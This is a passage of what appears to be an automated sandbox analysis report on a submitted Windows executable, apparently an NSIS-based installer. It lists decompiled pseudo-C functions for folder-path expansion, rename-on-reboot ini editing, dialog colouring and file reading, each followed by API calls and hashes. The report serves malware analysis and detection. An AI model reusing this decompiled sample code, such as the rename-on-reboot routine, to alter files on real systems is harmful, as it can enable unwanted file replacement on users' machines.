                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                      				}
                                                                                      				_t81 =  *_t105;
                                                                                      				_a8 = _t81;
                                                                                      				if(_t81 == 0) {
                                                                                      					L43:
                                                                                      					 *_t108 =  *_t108 & 0x00000000;
                                                                                      					if(_a4 == 0) {
                                                                                      						return _t45;
                                                                                      					}
                                                                                      					return E0040653D(_a4, _t45);
                                                                                      				} else {
                                                                                      					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                      						_t98 = 2;
                                                                                      						_t105 = _t105 + _t98;
                                                                                      						if(_t81 >= 4) {
                                                                                      							if(__eflags != 0) {
                                                                                      								 *_t108 = _t81;
                                                                                      								_t108 = _t108 + _t98;
                                                                                      								__eflags = _t108;
                                                                                      							} else {
                                                                                      								 *_t108 =  *_t105;
                                                                                      								_t108 = _t108 + _t98;
                                                                                      								_t105 = _t105 + _t98;
                                                                                      							}
                                                                                      							L42:
                                                                                      							_t82 =  *_t105;
                                                                                      							_a8 = _t82;
                                                                                      							if(_t82 != 0) {
                                                                                      								_t81 = _a8;
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                      						_t47 =  *_t105;
                                                                                      						_t48 = _t47 & 0x000000ff;
                                                                                      						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                      						_t85 = _t84 & 0x000000ff;
                                                                                      						_v28 = _t48 | 0x00008000;
                                                                                      						_t77 = 2;
                                                                                      						_v16 = _t85;
                                                                                      						_t105 = _t105 + _t77;
                                                                                      						_v24 = _t48;
                                                                                      						_v20 = _t85 | 0x00008000;
                                                                                      						if(_a8 != _t77) {
                                                                                      							__eflags = _a8 - 3;
                                                                                      							if(_a8 != 3) {
                                                                                      								__eflags = _a8 - 1;
                                                                                      								if(__eflags == 0) {
                                                                                      									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                      									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                      								}
                                                                                      								L38:
                                                                                      								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                      								_t45 = 0x432ea0;
                                                                                      								goto L42;
                                                                                      							}
                                                                                      							_t78 = _v12;
                                                                                      							__eflags = _t78 - 0x1d;
                                                                                      							if(_t78 != 0x1d) {
                                                                                      								__eflags = L"ppingA" + (_t78 << 0xb);
                                                                                      								E0040653D(_t108, L"ppingA" + (_t78 << 0xb));
                                                                                      							} else {
                                                                                      								E00406484(_t108,  *0x434f08);
                                                                                      							}
                                                                                      							__eflags = _t78 + 0xffffffeb - 7;
                                                                                      							if(__eflags < 0) {
                                                                                      								L29:
                                                                                      								E004067C4(_t108);
                                                                                      							}
                                                                                      							goto L38;
                                                                                      						}
                                                                                      						if( *0x434f84 != 0) {
                                                                                      							_t77 = 4;
                                                                                      						}
                                                                                      						_t121 = _t48;
                                                                                      						if(_t48 >= 0) {
                                                                                      							__eflags = _t48 - 0x25;
                                                                                      							if(_t48 != 0x25) {
                                                                                      								__eflags = _t48 - 0x24;
                                                                                      								if(_t48 == 0x24) {
                                                                                      									GetWindowsDirectoryW(_t108, 0x400);
                                                                                      									_t77 = 0;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									__eflags = _t77;
                                                                                      									if(_t77 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									_t59 =  *0x434f04;
                                                                                      									_t77 = _t77 - 1;
                                                                                      									__eflags = _t59;
                                                                                      									if(_t59 == 0) {
                                                                                      										L22:
                                                                                      										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                      										__eflags = _t61;
                                                                                      										if(_t61 != 0) {
                                                                                      											L24:
                                                                                      											 *_t108 =  *_t108 & 0x00000000;
                                                                                      											__eflags =  *_t108;
                                                                                      											continue;
                                                                                      										}
                                                                                      										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                      										_a8 = _t61;
                                                                                      										__imp__CoTaskMemFree(_v8);
                                                                                      										__eflags = _a8;
                                                                                      										if(_a8 != 0) {
                                                                                      											goto L26;
                                                                                      										}
                                                                                      										goto L24;
                                                                                      									}
                                                                                      									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                      									__eflags = _t63;
                                                                                      									if(_t63 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							GetSystemDirectoryW(_t108, 0x400);
                                                                                      							goto L26;
                                                                                      						} else {
                                                                                      							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                      							if( *_t108 != 0) {
                                                                                      								L27:
                                                                                      								if(_v16 == 0x1a) {
                                                                                      									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                      								}
                                                                                      								goto L29;
                                                                                      							}
                                                                                      							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                                      							L26:
                                                                                      							if( *_t108 == 0) {
                                                                                      								goto L29;
                                                                                      							}
                                                                                      							goto L27;
                                                                                      						}
                                                                                      					}
                                                                                      					goto L43;
                                                                                      				}
                                                                                      			}






























                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,00000000,?,75A423A0), ref: 004066A8
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ppingA
                                                                                      • API String ID: 4260037668-1593600796
                                                                                      • Opcode ID: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                                                      • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                      • Opcode Fuzzy Hash: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                                                      • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406183(void* __ecx) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				long _t12;
                                                                                      				long _t24;
                                                                                      				char* _t31;
                                                                                      				int _t37;
                                                                                      				void* _t38;
                                                                                      				intOrPtr* _t39;
                                                                                      				long _t42;
                                                                                      				WCHAR* _t44;
                                                                                      				void* _t46;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t53;
                                                                                      
                                                                                      				_t38 = __ecx;
                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                      				 *0x430908 = 0x55004e;
                                                                                      				 *0x43090c = 0x4c;
                                                                                      				if(_t44 == 0) {
                                                                                      					L3:
                                                                                      					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                      						_t53 = _t52 + 0x10;
                                                                                      						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                                      						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                                      						_t48 = _t12;
                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                      						if(_t48 != 0xffffffff) {
                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                      							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                                      								L18:
                                                                                      								return CloseHandle(_t48);
                                                                                      							} else {
                                                                                      								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                      									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                                      									if(_t49 == 0) {
                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                      										L16:
                                                                                      										_t24 = _t42;
                                                                                      										L17:
                                                                                      										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                      										E004060DF(_t48, _t46, _t42 + _t37);
                                                                                      										GlobalFree(_t46);
                                                                                      										goto L18;
                                                                                      									}
                                                                                      									_t39 = _t46 + _t42;
                                                                                      									_t31 = _t39 + _t37;
                                                                                      									while(_t39 > _t49) {
                                                                                      										 *_t31 =  *_t39;
                                                                                      										_t31 = _t31 - 1;
                                                                                      										_t39 = _t39 - 1;
                                                                                      									}
                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                      								_t42 = _t42 + 0xa;
                                                                                      								goto L16;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					CloseHandle(E0040602D(_t44, 0, 1));
                                                                                      					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}




















                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                      • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                      • wsprintfA.USER32 ref: 00406202
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                      • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                      • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                      • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				long _t39;
                                                                                      				long _t41;
                                                                                      				void* _t44;
                                                                                      				signed char _t50;
                                                                                      				long* _t54;
                                                                                      
                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                      					L18:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                      					goto L18;
                                                                                      				} else {
                                                                                      					_t50 = _t54[5];
                                                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                                                      						goto L18;
                                                                                      					}
                                                                                      					_t39 =  *_t54;
                                                                                      					if((_t50 & 0x00000002) != 0) {
                                                                                      						_t39 = GetSysColor(_t39);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                                                      						SetTextColor(_a8, _t39);
                                                                                      					}
                                                                                      					SetBkMode(_a8, _t54[4]);
                                                                                      					_t41 = _t54[1];
                                                                                      					_v16.lbColor = _t41;
                                                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                                                      						_t41 = GetSysColor(_t41);
                                                                                      						_v16.lbColor = _t41;
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                                                      						SetBkColor(_a8, _t41);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                                                      						_v16.lbStyle = _t54[2];
                                                                                      						_t44 = _t54[3];
                                                                                      						if(_t44 != 0) {
                                                                                      							DeleteObject(_t44);
                                                                                      						}
                                                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                      					}
                                                                                      					return _t54[3];
                                                                                      				}
                                                                                      			}










                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                      • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                      • GetSysColor.USER32(?), ref: 00404586
                                                                                      • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                      • DeleteObject.GDI32(?), ref: 004045B0
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t66;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t76;
                                                                                      				void* _t79;
                                                                                      
                                                                                      				_t72 = __edx;
                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                      				_t65 = 2;
                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                      				_t66 = E00402D84(_t65);
                                                                                      				_t79 = _t66 - 1;
                                                                                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                      				if(_t79 < 0) {
                                                                                      					L36:
                                                                                      					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                                      				} else {
                                                                                      					__ecx = 0x3ff;
                                                                                      					if(__eax > 0x3ff) {
                                                                                      						 *(__ebp - 0x44) = 0x3ff;
                                                                                      					}
                                                                                      					if( *__edi == __bx) {
                                                                                      						L34:
                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                      						__eax =  *(__ebp - 8);
                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                      						if(_t79 == 0) {
                                                                                      							 *(_t76 - 4) = 1;
                                                                                      						}
                                                                                      						goto L36;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x38) = __ebx;
                                                                                      						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                                      						if( *(__ebp - 0x44) > __ebx) {
                                                                                      							do {
                                                                                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                      										__eax = __ebp - 0x50;
                                                                                      										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											goto L21;
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L34;
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eax = __ebp - 0x40;
                                                                                      									_push(__ebx);
                                                                                      									_push(__ebp - 0x40);
                                                                                      									__eax = 2;
                                                                                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                      									if(__eax == 0) {
                                                                                      										goto L34;
                                                                                      									} else {
                                                                                      										__ecx =  *(__ebp - 0x40);
                                                                                      										if(__ecx == __ebx) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                      											 *(__ebp - 0x4c) = __ecx;
                                                                                      											 *(__ebp - 0x50) = __eax;
                                                                                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      												L28:
                                                                                      												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                      											} else {
                                                                                      												__ebp - 0x50 = __ebp + 0xa;
                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                      													L21:
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      												} else {
                                                                                      													__edi =  *(__ebp - 0x4c);
                                                                                      													__edi =  ~( *(__ebp - 0x4c));
                                                                                      													while(1) {
                                                                                      														_t22 = __ebp - 0x40;
                                                                                      														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                      														__eax = 0xfffd;
                                                                                      														 *(__ebp - 0x50) = 0xfffd;
                                                                                      														if( *_t22 == 0) {
                                                                                      															goto L22;
                                                                                      														}
                                                                                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                      														__edi = __edi + 1;
                                                                                      														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                      														__eax = __ebp + 0xa;
                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                      															continue;
                                                                                      														} else {
                                                                                      															goto L21;
                                                                                      														}
                                                                                      														goto L22;
                                                                                      													}
                                                                                      												}
                                                                                      												L22:
                                                                                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      													goto L28;
                                                                                      												} else {
                                                                                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                      														} else {
                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                      															__edx =  *(__ebp - 8);
                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														}
                                                                                      														goto L34;
                                                                                      													} else {
                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                      														__edx =  *(__ebp - 8);
                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														 *(__ebp - 0x38) = __eax;
                                                                                      														if(__ax == __bx) {
                                                                                      															goto L34;
                                                                                      														} else {
                                                                                      															goto L26;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L37;
                                                                                      								L26:
                                                                                      								__eax =  *(__ebp - 8);
                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                      						}
                                                                                      						goto L34;
                                                                                      					}
                                                                                      				}
                                                                                      				L37:
                                                                                      				return 0;
                                                                                      			}









                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                        • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                      • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                      • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                      • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004067C4(WCHAR* _a4) {
                                                                                      				short _t5;
                                                                                      				short _t7;
                                                                                      				WCHAR* _t19;
                                                                                      				WCHAR* _t20;
                                                                                      				WCHAR* _t21;
                                                                                      
                                                                                      				_t20 = _a4;
                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                      					_t20 =  &(_t20[4]);
                                                                                      				}
                                                                                      				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                                      					_t20 =  &(_t20[2]);
                                                                                      				}
                                                                                      				_t5 =  *_t20;
                                                                                      				_t21 = _t20;
                                                                                      				_t19 = _t20;
                                                                                      				if(_t5 != 0) {
                                                                                      					do {
                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                                      							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                      							_t19 = CharNextW(_t19);
                                                                                      						}
                                                                                      						_t20 = CharNextW(_t20);
                                                                                      						_t5 =  *_t20;
                                                                                      					} while (_t5 != 0);
                                                                                      				}
                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                      				while(1) {
                                                                                      					_push(_t19);
                                                                                      					_push(_t21);
                                                                                      					_t19 = CharPrevW();
                                                                                      					_t7 =  *_t19;
                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                      					if(_t21 < _t19) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}









                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                      • CharNextW.USER32(?,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                      • CharPrevW.USER32(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2977677972
                                                                                      • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                      • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                      • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                      • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
